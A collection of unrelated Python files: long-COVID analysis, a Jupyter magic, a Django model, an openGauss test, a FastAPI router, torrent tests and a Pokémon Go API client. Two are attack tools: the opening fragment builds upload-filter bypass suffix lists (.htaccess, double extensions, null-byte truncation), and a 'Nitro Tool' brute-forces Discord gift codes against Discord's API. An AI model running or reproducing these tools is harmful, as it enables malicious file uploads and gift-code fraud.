print u'[+] 加入%d条中间件漏洞完毕!' % len(middleware_parse_suffix)
# .htaccess
if (middleware == 'apache' or middleware == 'all') and (os == 'win' or os == 'all'):
htaccess_suffix = str_case_mixing(".htaccess")
print u'[+] 加入%d条.htaccess完毕!' % len(htaccess_suffix)
elif (middleware == 'apache' or middleware == 'all') and os == 'linux':
htaccess_suffix = ['.htaccess']
print u'[+] 加入1条.htaccess'
else:
htaccess_suffix = []
# 系统特性
if os == 'win':
os_parse_suffix = windows_suffix_creater(case_parse_suffix)
elif os == 'linux':
os_parse_suffix = parse_suffix
else:
win_suffix = windows_suffix_creater(case_parse_suffix)
linux_suffix = parse_suffix
os_parse_suffix = win_suffix + linux_suffix
os_parse_suffix = duplicate_removal(os_parse_suffix)
print u'[+] 加入%d条系统特性完毕!' % len(os_parse_suffix)
# 语言漏洞
language_parse_suffux = str_00_truncation(case_parse_suffix,allow_suffix)
# 双后缀 + 大小写混合
if double_suffix:
double_parse_suffix = list_double_suffix_creater(case_parse_suffix)
print u'[+] 加入%d条双后缀完毕!' % len(double_parse_suffix)
else:
double_parse_suffix = []
all_parse_suffix = case_parse_suffix + middleware_parse_suffix + os_parse_suffix + language_parse_suffux + double_parse_suffix
all_parse_suffix = duplicate_removal(all_parse_suffix)
all_parse_suffix = clear_list(all_parse_suffix)
# 写文件
num = len(all_parse_suffix)
for i in all_parse_suffix:
str = '%s.%s' % (upload_file_name,i)
#print '[+] '+type(str)
f.write(str)
f.write('\n')
num += len(htaccess_suffix)
for i in htaccess_suffix:
f.write(i)
f.write('\n')
f.close()
print u'[+] 去重后共%s条数据写入%s文件' % (num,output_filename)
|
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from common_variables import demographic_variables, clinical_variables
pd.set_option("display.max_rows", 50)
results_path = "output/practice_summ.txt"
long_covid_codelists = [
"opensafely-nice-managing-the-long-term-effects-of-covid-19",
"opensafely-referral-and-signposting-for-long-covid",
"opensafely-assessment-instruments-and-outcome-measures-for-long-covid",
]
combined_codelists = [
pd.read_csv(f"codelists/{path}.csv", index_col="code")
for path in long_covid_codelists
]
combined_codelists = pd.concat(combined_codelists)
individual_code_dates = [f"snomed_{c}_date" for c in combined_codelists.index]
def crosstab(idx):
cols = ["No long COVID", "Long COVID", "Rate per 100,000", "%"]
counts = pd.crosstab(idx, df["long_covid"], normalize=False, dropna=False)
rates = (
pd.crosstab(idx, df["long_covid"], normalize="index", dropna=False)[1] * 100000
).round(1)
percentages = (
pd.crosstab(idx, df["long_covid"], normalize="columns", dropna=False)[1] * 100
).round(1)
all_cols = pd.concat([counts, rates, percentages], axis=1)
all_cols.columns = cols
return all_cols
def redact_small_numbers(df, column):
mask = df[column].isin([1, 2, 3, 4, 5])
df.loc[mask, :] = np.nan
return df
def write_to_file(text_to_write, erase=False):
if erase and os.path.isfile(results_path):
os.remove(results_path)
with open(results_path, "a") as txt:
txt.writelines(f"{text_to_write}\n")
print(text_to_write)
txt.writelines("\n")
print("\n")
df = pd.read_stata(
"output/input.dta",
index_col="patient_id",
convert_categoricals=False
)
# Find first COVID date
first_covid_date = df[["sgss_positive", "primary_care_covid", "hospital_covid"]].min(
axis=1
)
## Crosstabs
df["comorbidities"] = df[
[
"diabetes",
"cancer",
"haem_cancer",
"asthma",
"chronic_respiratory_disease",
"chronic_cardiac_disease",
"chronic_liver_disease",
"stroke_or_dementia",
"other_neuro",
"organ_transplant",
"dysplenia",
"ra_sle_psoriasis",
"other_immunosup_cond",
]
].sum(axis=1)
df.loc[df["comorbidities"] > 2, "comorbidities"] = 2
stratifiers = list(demographic_variables.keys()) + [
"bmi",
"comorbidities",
"mental_health",
"asthma",
"diabetes",
]
crosstabs = [crosstab(df[v]) for v in stratifiers]
all_together = pd.concat(
crosstabs, axis=0, keys=stratifiers + ["imd"], names=["Attribute", "Category"]
)
print(all_together)
redact_small_numbers(all_together, "Long COVID").to_csv("output/counts_table.csv")
|
# Copyright (c) Metakernel Development Team.
# Distributed under the terms of the Modified BSD License.
from IPython.core.magic import magic_escapes
from metakernel import Magic
import os
class LSMagicMagic(Magic):
def line_lsmagic(self):
"""
%lsmagic - list the current line and cell magics
This line magic will list all of the available cell and line
magics installed in the system and in your personal magic
folder.
Example:
%lsmagic
"""
mesc = magic_escapes['line']
cesc = magic_escapes['cell']
line_magics = self.kernel.line_magics.keys()
cell_magics = self.kernel.cell_magics.keys()
mp = self.kernel.magic_prefixes['magic']
out = [
'Available line magics:',
' '.join(sorted([(mp + lm) for lm in line_magics])),
'',
'Available cell magics:',
' '.join(sorted([(mp + mp + cm) for cm in cell_magics])),
]
self.kernel.Print('\n'.join(out))
def register_magics(kernel):
kernel.register_magics(LSMagicMagic)
|
from django.db import models
from django.contrib import admin
from rest_framework import serializers
class Team(models.Model):
class Meta:
verbose_name = 'Team'
name = models.CharField(max_length=255)
event = models.ForeignKey(
to='Event',
on_delete=models.CASCADE
)
def __str__(self):
return self.name
class TeamSerializer(serializers.ModelSerializer):
class Meta:
model = Team
fields = ('name', 'event', 'pk')
class TeamAdmin(admin.ModelAdmin):
list_display = ('name', 'event', 'pk')
admin.site.register(Team, TeamAdmin)
|
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : 服务端工具
Case Name : gs_checkos工具显示帮助信息(正常)
Description :
1.显示帮助信息(-?)
2.显示帮助信息(--help)
Expect :
1.显示正确
2.显示正确
History :
"""
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
logger = Logger()
class Tools(unittest.TestCase):
def setUp(self):
logger.info('--------------Opengauss_Function_Tools_gs_checkos_Case0001start-------------------')
self.rootNode = Node('default')
self.Constant = Constant()
def test_server_tools1(self):
logger.info('------------------显示帮助信息------------------')
logger.info('--------------执行命令获取帮助信息--------------')
cmd_list = ['-?', '--help']
for cmd in cmd_list:
check_cmd1 = f'''source {macro.DB_ENV_PATH}
gs_checkos {cmd}'''
logger.info(check_cmd1)
msg1 = self.rootNode.sh(check_cmd1).result()
logger.info(msg1)
logger.info('--------------从Usage:开始截取msg1---------------')
start_index1 = msg1.find('Usage:')+len('Usage:')
start_index2 = msg1.find('General options:')
start_index3 = msg1.find('Item number description:')+len('Item number description:')
logger.info('--------------截取语法部分---------------')
temp1 = msg1[start_index1:start_index2].split('\n')
options_list1 = []
for i in temp1[1:-2]:
options_list1.append(i.strip())
logger.info(options_list1)
grammar = ['gs_checkos -? | --help',
'gs_checkos -V | --version',
'gs_checkos -i ITEM [-f HOSTFILE] [-h HOSTNAME] [-X XMLFILE] [--detail] [-o OUTPUT] [-l LOGFILE]']
if len(options_list1) == len(grammar):
for opt in options_list1:
if opt in grammar:
logger.info(f'{opt}---------语法校验通过---------')
else:
logger.error(f'{opt}---------语法校验不通过---------')
else:
logger.error('---------语法校验有误---------')
logger.info('--------------截取中间参数部分---------------')
options_list2 = []
for i in msg1[start_index2:start_index3].split('\n'):
for j in i.split(' '):
if len(j) != 0:
if j[0] == '-':
options_list2.append(j)
else:
pass
else:
pass
logger.info(options_list2)
parameter1 = ['-i', '-f', '-h', '-X', '--detail', '-o', '-l', '-?', '--help', '-V', '--version']
if len(options_list2) == len(parameter1):
for opt in options_list2:
if opt in parameter1:
logger.info(f'{opt}---------参数校验通过---------')
else:
logger.error(f'{opt}---------参数校验不通过---------')
else:
logger.error('---------参数校验有误---------')
logger.info('--------------截取最后面参数部分---------------')
temp2 = msg1[start_index3:].split('\n')
logger.info(temp2)
options_list3 = []
for j in temp2[1:]:
options_list3.append(j.strip())
logger.info(options_list3)
parameter2 =[
"'A1':[ OS version status ]","'A2':[ Kernel version status ]","'A3':[ Unicode status ]",
"'A4':[ Time zone status ]","'A5':[ Swap memory status ]","'A6':[ System control parameters status ]",
"'A7':[ File system configuration status ]","'A8':[ Disk configuration status ]",
"'A9':[ Pre-read block size status ]","'A10':[ IO scheduler status ]","'A11':[ Network card configuration status ]",
"'A12':[ Time consistency status ]","'A13':[ Firewall service status ]","'A14':[ THP service status ]",
"'B1':[ Set system control parameters ]","'B2':[ Set file system configuration value ]","'B3':[ Set pre-read block size value ]",
"'B4':[ Set IO scheduler value ]","'B5':[ Set network card configuration value ]","'B6':[ Set THP service ]",
"'B7':[Set RemoveIPC value]","'B8':[Set Session Process]"]
if len(options_list3) == len(parameter2):
for opt in options_list3:
if opt in parameter2:
logger.info(f'{opt}---------参数校验通过---------')
else:
logger.error(f'{opt}---------参数校验不通过---------')
else:
logger.error('---------参数校验有误---------')
def tearDown(self):
logger.info('--------------无需清理环境-------------------')
logger.info('------------------Opengauss_Function_Tools_gs_checkos_Case0001finish------------------') |
"""
**User** record management implemented by factories
---------------------------------------------------
This module defines API routes for managing **User** records, and defines the :class:`JoinAssoc` data to describe the relationship between **User** records and other record types: **Domain**, **Email**, and **Quota**.
As such, this is the only router where the factories are used to create or update records with multiple associations. It seems a good opportunity for another example.
"""
from typing import List
from fastapi import status, APIRouter
from chapps.models import (
User,
Quota,
Domain,
Email,
UserResp,
UsersResp,
DomainsResp,
EmailsResp,
DeleteResp,
IntResp,
TextResp,
AssocOperation,
)
from chapps.rest.routers.common import (
get_item_by_id,
list_items,
create_item,
delete_item,
update_item,
adjust_associations,
list_associated,
)
import logging
import chapps.logging
logger = logging.getLogger(__name__)
api = APIRouter(
prefix="/users",
tags=["users"],
responses={404: {"description": "User not found."}},
)
"""The API router for **User** record maintenance
This router is once again full of calls to the factories in the :mod:`~.common`
module. The **User** model is the most connected to other things, however, and
so seems like a good spot for examples related to associations.
.. _creating-users:
.. rubric:: Creating Users
When creating a **User** record, it seems likely that the caller might like to
automatically associate the new **User** with an existing **Quota** record, and
at least one **Domain** record, perhaps even an **Email** record. The factory
will provide a coroutine which will optionally accept ID lists for these
associations. That is to say, the coroutine will treat them as optional
arguments and do nothing if they are not provided.
All of the logic and magic behind making this go smoothly is hidden within the
:class:`.JoinAssoc` class. We simply provide a list of these associations to
the factory and it handles the rest:
.. code:: python
api.post(
"/",
status_code=201,
response_model=UserResp,
responses={status.HTTP_409_CONFLICT: {"description": "Unique key error."}},
)(create_item(User, response_model=UserResp, assoc=user_join_assoc))
In the above example, the `FastAPI`_ code for specifying details about the POST
route takes up more space than the factory call to obtain the actual **User**
creation coroutine.
The definition of :const:`.user_join_assoc` may be found below. It is a list
containing references to all three :class:`~.JoinAssoc` instances, relating to
a **Quota** and lists of **Domain** and **Email** records.
.. _handling-associations:
.. rubric:: Handling Associations
Sometimes there is a need to remove a specific association from a list, or add
one or a handful. It would be helpful if it were not necessary to obtain or
manufacture a list of IDs in order to use a replacement-type edit such as the
basic model update route. The **User** model has a number of different
associations to manage, so here is an example of adding domains:
.. code:: python
api.put("/{item_id}/domains/", response_model=TextResp)(
adjust_associations(
User, assoc=[user_domains_assoc], assoc_op=AssocOperation.add
)
)
I chose to use PUT because it is associated with partial updates. Within the
API router wrapper, we use a call to the :func:`~.adjust_associations` route
factory, which returns a coroutine which will take a **User** ID and a list of
**Domain** IDs as arguments. When invoked via the API, that coroutine will
ensure that all the existing **Domain** records listed are associated to the
**User**. :exc:`~sqlalchemy.exc.IntegrityError` is ignored during the process,
so any attempts to add an existing association or to add a nonexistent
**Domain** will not raise errors -- all existing **Domain** records identified
by ID will be associated to the **User**, and other associations to that
**User** will be preserved.
"""
user_quota_assoc = User.join_assoc(
assoc_name="quota",
assoc_type=int,
assoc_model=Quota,
assoc_id=Quota.id_name(),
table=User.Meta.orm_model.metadata.tables["quota_user"],
)
user_domains_assoc = User.join_assoc(
assoc_name="domains",
assoc_type=List[int],
assoc_model=Domain,
assoc_id=Domain.id_name(),
table=User.Meta.orm_model.metadata.tables["domain_user"],
)
user_emails_assoc = User.join_assoc(
assoc_name="emails",
assoc_type=List[int],
assoc_model=Email,
assoc_id=Email.id_name(),
table=User.Meta.orm_model.metadata.tables["email_user"],
)
user_join_assoc = [user_quota_assoc, user_domains_assoc, user_emails_assoc]
api.post(
"/",
status_code=201,
response_model=UserResp,
responses={status.HTTP_409_CONFLICT: {"description": "Unique key error."}},
)(create_item(User, response_model=UserResp, assoc=user_join_assoc))
api.delete("/", response_model=DeleteResp)(delete_item(User))
api.get("/", response_model=UsersResp)(
list_items(User, response_model=UsersResp)
)
api.get("/{item_id}", response_model=UserResp)(
get_item_by_id(User, response_model=UserResp, assoc=user_join_assoc)
)
api.get("/{item_id}/domains/", response_model=DomainsResp)(
list_associated(User, assoc=user_domains_assoc, response_model=DomainsResp)
)
api.get("/{item_id}/emails/", response_model=EmailsResp)(
list_associated(User, assoc=user_emails_assoc, response_model=EmailsResp)
)
api.put("/", response_model=UserResp)(
update_item(User, response_model=UserResp, assoc=user_join_assoc)
)
api.put("/{item_id}/domains/", response_model=TextResp)(
adjust_associations(
User, assoc=[user_domains_assoc], assoc_op=AssocOperation.add
)
)
api.put("/{item_id}/emails/", response_model=TextResp)(
adjust_associations(
User, assoc=[user_emails_assoc], assoc_op=AssocOperation.add
)
)
api.delete("/{item_id}/emails/")(
adjust_associations(
User, assoc=[user_emails_assoc], assoc_op=AssocOperation.subtract
)
)
api.delete("/{item_id}/domains/", response_model=TextResp)(
adjust_associations(
User, assoc=[user_domains_assoc], assoc_op=AssocOperation.subtract
)
)
# note that the correct name of the quota parameter is necessary here
api.put("/{item_id}/quota/{quota}")(
adjust_associations(
User, assoc=[user_quota_assoc], assoc_op=AssocOperation.replace
)
)
# commenting out to get a clean release without these non-working routes
#
# we will provide these routes in a future release
# along with routes to count a user's domain authorizations
# and paginate the list of those authorizations
# @api.get("/count/", response_model=IntResp)
# async def count_all_users():
# return await count_users("%")
# @api.get("/count/{pattern}", response_model=IntResp)
# async def count_users(pattern: str):
# cur = pca.conn.cursor()
# sanitized_pattern = pattern
# query = f"SELECT COUNT( * ) FROM users WHERE name LIKE ?"
# logger.debug(
# f"Attempting to count users like {pattern} with query {query}"
# )
# cur.execute(query, (f"%{pattern}%",))
# results = cur.fetchone()[0]
# cur.close()
# return IntResp.send(results)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test suite for zcomx/modules/torrents.py
"""
import os
import shutil
import unittest
from gluon import *
from applications.zcomx.modules.book_types import BookType
from applications.zcomx.modules.books import Book
from applications.zcomx.modules.creators import \
AuthUser, \
Creator
from applications.zcomx.modules.torrentparse import TorrentParser
from applications.zcomx.modules.torrents import \
AllTorrentCreator, \
BaseTorrentCreator, \
BookTorrentCreator, \
CreatorTorrentCreator, \
P2PNotifier, \
P2PNotifyError, \
TorrentCreateError
from applications.zcomx.modules.tests.runner import LocalTestCase
# C0111: Missing docstring
# R0904: Too many public methods
# pylint: disable=C0111,R0904
class SubBaseTorrentCreator(BaseTorrentCreator):
# W0201: *Attribute %r defined outside __init__*
# pylint: disable=W0201
def get_destination(self):
return self._destination
def get_target(self):
return self._target
def set_destination(self, dst):
"""Helper function to allow the destination to be provided."""
self._destination = dst
def set_target(self, target):
"""Helper function to allow the target to be provided."""
self._target = target
class TorrentTestCase(LocalTestCase):
_tmp_dir = '/tmp/test_torrent'
_test_file = None
_test_path = None
_test_creator_path = None
_cbz_base_path = None
# C0103: *Invalid name "%s" (should match %s)*
# pylint: disable=C0103
@classmethod
def setUpClass(cls):
if not os.path.exists(cls._tmp_dir):
os.makedirs(cls._tmp_dir)
# Create some files to used for testing
cls._test_file = os.path.join(cls._tmp_dir, 'file.cbz')
if not os.path.exists(cls._test_file):
with open(cls._test_file, 'w') as f:
f.write('Testing')
cls._test_path = os.path.join(cls._tmp_dir, 'subdir')
if not os.path.exists(cls._test_path):
os.makedirs(cls._test_path)
for filename in ['a.cbz', 'b.cbz', 'c.cbz']:
with open(os.path.join(cls._test_path, filename), 'w') as f:
f.write('Testing')
cls._test_creator_path = os.path.join(
cls._tmp_dir, 'cbz', 'zco.mx', 'F', 'FirstLast', 'subdir')
if not os.path.exists(cls._test_creator_path):
os.makedirs(cls._test_creator_path)
for filename in ['a.cbz', 'b.cbz', 'c.cbz']:
fullname = os.path.join(cls._test_creator_path, filename)
with open(fullname, 'w') as f:
f.write('Testing')
@classmethod
def tearDownClass(cls):
if os.path.exists(cls._tmp_dir):
shutil.rmtree(cls._tmp_dir)
class TestBaseTorrentCreator(TorrentTestCase):
def test____init__(self):
tor_creator = BaseTorrentCreator()
self.assertTrue(tor_creator)
def test__archive(self):
tor_creator = SubBaseTorrentCreator()
tor_creator.set_target(self._test_file)
tor_creator.set_destination('F/FirstLast/file.torrent')
tor_file = tor_creator.archive(base_path=self._tmp_dir)
self.assertEqual(
tor_file,
'/tmp/test_torrent/tor/zco.mx/F/FirstLast/file.torrent'
)
self.assertTrue(os.path.exists(tor_file))
parser = TorrentParser(tor_file)
self.assertEqual(
parser.get_tracker_url(),
b'http://bt.zco.mx:6969/announce'
)
self.assertEqual(
parser.get_client_name(),
b'mktorrent 1.1'
)
self.assertEqual(
parser.get_files_details(),
[(b'file.cbz', 7)]
)
def test__create(self):
# W0212 (protected-access): *Access to a protected member
# pylint: disable=W0212
tor_creator = SubBaseTorrentCreator()
# Test creating torrent for a file.
tor_creator.set_target(self._test_file)
tor_creator.create()
tor_file = os.path.join(tor_creator.temp_directory(), 'file.torrent')
self.assertEqual(
tor_creator._tor_file,
tor_file
)
self.assertTrue(os.path.exists(tor_file))
# Check that it's a torrent file
parser = TorrentParser(tor_file)
self.assertEqual(
parser.get_tracker_url(),
b'http://bt.zco.mx:6969/announce'
)
self.assertEqual(
parser.get_client_name(),
b'mktorrent 1.1'
)
self.assertEqual(
parser.get_files_details(),
[(b'file.cbz', 7)]
)
# Test creating torrent for a directory.
tor_creator = SubBaseTorrentCreator()
tor_creator.set_target(self._test_path)
tor_creator.create()
tor_file = os.path.join(tor_creator.temp_directory(), 'file.torrent')
self.assertEqual(
tor_creator._tor_file,
tor_file
)
self.assertTrue(os.path.exists(tor_file))
# Check that it's a torrent file
parser = TorrentParser(tor_file)
self.assertEqual(
parser.get_tracker_url(),
b'http://bt.zco.mx:6969/announce'
)
self.assertEqual(
parser.get_client_name(),
b'mktorrent 1.1'
)
self.assertEqual(
parser.get_files_details(),
[('a.cbz', 7), ('b.cbz', 7), ('c.cbz', 7)]
)
def test__get_destination(self):
tor_creator = BaseTorrentCreator()
self.assertRaises(NotImplementedError, tor_creator.get_destination)
def test__get_target(self):
tor_creator = BaseTorrentCreator()
self.assertRaises(NotImplementedError, tor_creator.get_target)
class TestAllTorrentCreator(TorrentTestCase):
def test____init__(self):
tor_creator = AllTorrentCreator()
self.assertTrue(tor_creator)
def test__get_destination(self):
tor_creator = AllTorrentCreator()
self.assertEqual(
tor_creator.get_destination(),
'zco.mx.torrent'
)
def test__get_target(self):
tor_creator = AllTorrentCreator()
self.assertEqual(
tor_creator.get_target(),
'applications/zcomx/private/var/cbz/zco.mx'
)
class TestBookTorrentCreator(TorrentTestCase):
def test____init__(self):
book = self.add(Book, dict(
name='Test Book Torrent Creator'
))
tor_creator = BookTorrentCreator(book)
self.assertTrue(tor_creator)
def test__archive(self):
auth_user = self.add(AuthUser, dict(name='First Last'))
creator = self.add(Creator, dict(auth_user_id=auth_user.id))
book = self.add(Book, dict(
name='My Book',
publication_year=1999,
creator_id=creator.id,
book_type_id=BookType.by_name('one-shot').id,
))
tor_creator = BookTorrentCreator(book)
# book.cbz is not defined, should fail
self.assertRaises(TorrentCreateError, tor_creator.archive)
book = Book.from_updated(book, dict(cbz=self._test_file))
tor_creator = BookTorrentCreator(book)
tor_file = tor_creator.archive(base_path=self._tmp_dir)
self.assertEqual(
tor_file,
os.path.join(
'/tmp/test_torrent/tor/zco.mx',
'F/FirstLast/My Book (1999) ({i}.zco.mx).cbz.torrent'.format(
i=creator.id)
)
)
got = Book.from_id(book.id)
self.assertEqual(got.torrent, tor_file)
def test__get_destination(self):
auth_user = self.add(AuthUser, dict(name='First Last'))
creator = self.add(Creator, dict(auth_user_id=auth_user.id))
book = self.add(Book, dict(
name='My Book',
publication_year=1999,
creator_id=creator.id,
book_type_id=BookType.by_name('one-shot').id,
))
tor_creator = BookTorrentCreator(book)
self.assertEqual(
tor_creator.get_destination(),
'F/FirstLast/My Book (1999) ({i}.zco.mx).cbz.torrent'.format(
i=creator.id)
)
def test__get_target(self):
book = self.add(Book, dict(
name='Test Book Torrent Creator',
cbz='/path/to/file.cbz',
))
tor_creator = BookTorrentCreator(book)
self.assertEqual(
tor_creator.get_target(),
'/path/to/file.cbz'
)
class TestCreatorTorrentCreator(TorrentTestCase):
def test____init__(self):
creator = Creator(dict(
email='test____init__@gmail.com'
))
tor_creator = CreatorTorrentCreator(creator)
self.assertTrue(tor_creator)
def test__archive(self):
auth_user = self.add(AuthUser, dict(name='First Last'))
creator = self.add(Creator, dict(auth_user_id=auth_user.id))
tor_creator = CreatorTorrentCreator(creator)
# The target cbz directory won't exist
self.assertRaises(LookupError, tor_creator.archive)
tor_creator = CreatorTorrentCreator(creator)
tor_creator.set_cbz_base_path(self._tmp_dir)
tor_file = tor_creator.archive(base_path=self._tmp_dir)
fmt = '/tmp/test_torrent/tor/zco.mx/F/FirstLast ({i}.zco.mx).torrent'
self.assertEqual(tor_file, fmt.format(i=creator.id))
updated_creator = Creator.from_id(creator.id)
self.assertEqual(updated_creator.torrent, tor_file)
def test__get_destination(self):
auth_user = self.add(AuthUser, dict(name='First Last'))
creator = self.add(Creator, dict(auth_user_id=auth_user.id))
tor_creator = CreatorTorrentCreator(creator)
self.assertEqual(
tor_creator.get_destination(),
'F/FirstLast ({cid}.zco.mx).torrent'.format(cid=creator.id)
)
def test__get_target(self):
auth_user = self.add(AuthUser, dict(name='First Last'))
creator = self.add(Creator, dict(auth_user_id=auth_user.id))
tor_creator = CreatorTorrentCreator(creator)
self.assertEqual(
tor_creator.get_target(),
'applications/zcomx/private/var/cbz/zco.mx/F/FirstLast'
)
def test__set_cbz_base_path(self):
# W0212 (protected-access): *Access to a protected member
# pylint: disable=W0212
auth_user = self.add(AuthUser, dict(name='First Last'))
creator = self.add(Creator, dict(auth_user_id=auth_user.id))
tor_creator = CreatorTorrentCreator(creator)
self.assertEqual(tor_creator._cbz_base_path, None)
tor_creator.set_cbz_base_path(self._tmp_dir)
self.assertEqual(tor_creator._cbz_base_path, self._tmp_dir)
class TestP2PNotifier(TorrentTestCase):
def test____init__(self):
notifier = P2PNotifier('aaa.cbz')
self.assertTrue(notifier)
def test__notify(self):
notifier = P2PNotifier(self._test_file)
# This test should fail. The test server doesn't have the
# required tools installed. If the exception is raised, it's
# proof the script was run, which is all we need to test.
self.assertRaises(
P2PNotifyError,
notifier.notify
)
class TestTorrentCreateError(LocalTestCase):
def test_parent_init(self):
msg = 'This is an error message.'
try:
raise TorrentCreateError(msg)
except TorrentCreateError as err:
self.assertEqual(str(err), msg)
else:
self.fail('TorrentCreateError not raised')
def setUpModule():
"""Set up web2py environment."""
# C0103: *Invalid name "%%s" (should match %%s)*
# pylint: disable=C0103
LocalTestCase.set_env(globals())
if __name__ == '__main__':
unittest.main()
|
from time import *
from discord_webhook import DiscordWebhook
import json, subprocess, random, string, time, requests, colorama, ctypes, os
import requests
import rainbowtext
colors = {\
'B' : '\033[94m',
'OKGREEN' : '\033[92m',
'WARNING' : '\033[93m',
'RED' : '\033[1;31;40m',
'reset':'\033[0m'
}
def colorText(text):
for color in colors:
text = text.replace("[[" + color + "]]", colors[color])
return text
def Main():
reset = '[[reset]]'
banner1=('''
[[B]]███▄ █ ██▓▄▄▄█████▓ ██▀███ ▒█████ ▄▄▄█████▓ ▒█████ ▒█████ ██▓
██ ▀█ █ ▓██▒▓ ██▒ ▓▒▓██ ▒ ██▒▒██▒ ██▒ ▓ ██▒ ▓▒▒██▒ ██▒▒██▒ ██▒▓██▒
▓██ ▀█ ██▒▒██▒▒ ▓██░ ▒░▓██ ░▄█ ▒▒██░ ██▒ ▒ ▓██░ ▒░▒██░ ██▒▒██░ ██▒▒██░
▓██▒ ▐▌██▒░██░░ ▓██▓ ░ ▒██▀▀█▄ ▒██ ██░ ░ ▓██▓ ░ ▒██ ██░▒██ ██░▒██░
▒██░ ▓██░░██░ ▒██▒ ░ ░██▓ ▒██▒░ ████▓▒░ ▒██▒ ░ ░ ████▓▒░░ ████▓▒░░██████▒
░ ▒░ ▒ ▒ ░▓ ▒ ░░ ░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ░░ ░ ▒░▒░▒░ ░ ▒░▒░▒░ ░ ▒░▓ ░
░ ░░ ░ ▒░ ▒ ░ ░ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ░ ▒ ░
░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
[[reset]]''')
banner2=('''
╔═════════════════════════════════════════════════════════╗
║ Nitro Tool by viic ║
║═════════════════════════════════════════════════════════║
║ [1] NITRO CODE GENERADOR ║
║ [2] NITRO CODE CHECKER ║
║ [E] EXIT ║
╚═════════════════════════════════════════════════════════╝
''')
print(colorText(banner1))
print((rainbowtext.text(banner2)))
print(colorText(reset))
h = input('escoja la herramienta que desea utilizar> ')
if h == '1':
Gen()
elif h == '2':
Checker()
def Checker():
checked = 0
valido = 0
invalido = 0
f=open("codes.txt","r+", encoding='utf-8')
v=open("valid_codes.txt","a", encoding='utf-8')
for line in f:
nitro = line.strip("\n")
url = "https://discordapp.com/api/v9/entitlements/gift-codes/" + nitro + "?with_application=false&with_subscription_plan=true"
r = requests.get(url)
if r.status_code == 200:
print(colorText('[[OKGREEN]][VALIDO][[reset]]'+str(nitro)))
v.write(f"{nitro}\n")
checked += 1
valido += 1
else:
print(colorText(f'[[RED]][INVALIDO][[reset]]{nitro}'))
checked += 1
invalido += 1
f.close()
v.close()
print(f"\nSe checkearon códigos nitro,[[OKGREEN]]{valido} Validos[[reset]] y [[RED]]{invalido} Invalidos[[reset]]\n")
input(f" Presione cualquier tecla para volver al Menu de Inicio")
Main()
def Gen():
num=int(input(f"¿Cuantos códigos desea generar? "))
path = str(os.getcwd())+"/" + "codes.txt"
contador = 1
start = time.time()
while contador <= num:
f=open("codes.txt","a", encoding='utf-8')
nitro = ''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(16))
f.write(nitro+'\n')
print(nitro)
f.close()
contador += 1
end = time.time()
input(f"\n Presiona cualquier tecla para volver al Menó de Inicio.")
print(end-start)
if input == input:
Main()
Main()
|
from logging import getLogger
from yarl import URL
from aiohttp import BasicAuth
try:
from aiosocks import Socks4Auth, Socks5Auth
except ImportError:
class Socks4Auth(Exception):
def __init__(*args, **kwargs):
raise ImportError(
'You must install aiosocks to use a SOCKS proxy.')
Socks5Auth = Socks4Auth
from . import __title__, __version__
from .rpc_api import RpcApi, RpcState
from .auth_ptc import AuthPtc
from .auth_google import AuthGoogle
from .hash_server import HashServer
from .exceptions import AuthTokenExpiredException, InvalidCredentialsException, NoPlayerPositionSetException, ServerApiEndpointRedirectException
from .pogoprotos.networking.requests.request_type_pb2 import RequestType
from .pogoprotos.networking.platform.platform_request_type_pb2 import PlatformRequestType
class PGoApi:
log = getLogger(__name__)
log.info('%s v%s', __title__, __version__)
def __init__(self, lat=None, lon=None, alt=None, proxy=None, device_info=None):
self.auth_provider = None
self.state = RpcState()
self._api_endpoint = 'https://pgorelease.nianticlabs.com/plfe/rpc'
self.latitude = lat
self.longitude = lon
self.altitude = alt
self.proxy_auth = None
self.proxy = proxy
self.device_info = device_info
async def set_authentication(self, provider='ptc', username=None, password=None, timeout=10, locale='en_US', refresh_token=None):
if provider == 'ptc':
self.auth_provider = AuthPtc(
username,
password,
proxy=self._proxy,
proxy_auth=self.proxy_auth,
timeout=timeout)
elif provider == 'google':
self.auth_provider = AuthGoogle(
proxy=self._proxy, refresh_token=refresh_token)
if refresh_token:
return await self.auth_provider.get_access_token()
else:
raise InvalidCredentialsException(
"Invalid authentication provider - only ptc/google available.")
await self.auth_provider.user_login(username, password)
def set_position(self, lat, lon, alt=None):
self.log.debug('Set Position - Lat: %s Lon: %s Alt: %s', lat, lon, alt)
self.latitude = lat
self.longitude = lon
self.altitude = alt
def create_request(self):
return PGoApiRequest(self)
@staticmethod
def activate_hash_server(hash_token, conn_limit=300):
HashServer.set_token(hash_token)
HashServer.activate_session(conn_limit)
@property
def position(self):
return self.latitude, self.longitude, self.altitude
@property
def api_endpoint(self):
return self._api_endpoint
@api_endpoint.setter
def api_endpoint(self, api_url):
if api_url.startswith("https"):
self._api_endpoint = URL(api_url)
else:
self._api_endpoint = URL('https://' + api_url + '/rpc')
@property
def proxy(self):
return self._proxy
@proxy.setter
def proxy(self, proxy):
if proxy is None:
self._proxy = proxy
else:
self._proxy = URL(proxy)
if self._proxy.user:
scheme = self._proxy.scheme
if scheme == 'http':
self.proxy_auth = BasicAuth(
self._proxy.user, self._proxy.password)
elif scheme == 'socks5':
self.proxy_auth = Socks5Auth(
self._proxy.user, self._proxy.password)
elif scheme == 'socks4':
self.proxy_auth = Socks4Auth(self._proxy.user)
else:
raise ValueError(
'Proxy protocol must be http, socks5, or socks4.')
@property
def start_time(self):
